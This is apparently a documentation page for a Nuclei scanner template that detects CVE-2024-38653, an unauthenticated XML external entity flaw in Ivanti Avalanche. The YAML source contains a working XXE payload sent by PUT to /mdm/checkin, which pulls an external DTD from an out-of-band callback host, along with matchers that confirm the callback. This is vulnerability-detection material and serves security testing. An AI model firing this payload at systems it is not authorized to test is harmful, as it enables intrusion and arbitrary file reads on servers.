Skip to content
Nuclei Templates

Ivanti Avalanche SmartDeviceServer - XML External Entity

ID: CVE-2024-38653

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2024,intrusive,ivanti,avalanche,xxe

Description

Section titled “Description”

XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server.

YAML Source

Section titled “YAML Source”
id: CVE-2024-38653


info:
  name: Ivanti Avalanche SmartDeviceServer - XML External Entity
  author: DhiyaneshDK
  severity: high
  description: |
    XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server.
  reference:
    - https://github.com/D4mianWayne/POCs/tree/main/CVE%202024-38653
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/cve-2024-38653
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-38653
    cwe-id: CWE-611
    epss-score: 0.00697
    epss-percentile: 0.80671
    cpe: cpe:2.3:a:ivanti:avalanche:6.3.1:*:*:*:premise:*:*:*
  metadata:
    max-request: 1
    vendor: ivanti
    product: avalanche
  tags: cve,cve2024,intrusive,ivanti,avalanche,xxe


variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"


http:
  - raw:
      - |
        PUT /mdm/checkin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml


        <?xml version="1.0" ?>
        <!DOCTYPE a [
        <!ENTITY % asd SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd">
        %asd;
        %c;
        ]>
        <a></a>


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"


      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
# digest: 4b0a00483046022100dbc0dfff5122953254c8c6568511aa2aadf24f87899a13591075184d1669d21702210092c51f879f980b13c6d6e69998acac105dd709107279781dcaef2290cf13d512:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-38653.yaml"

View on Github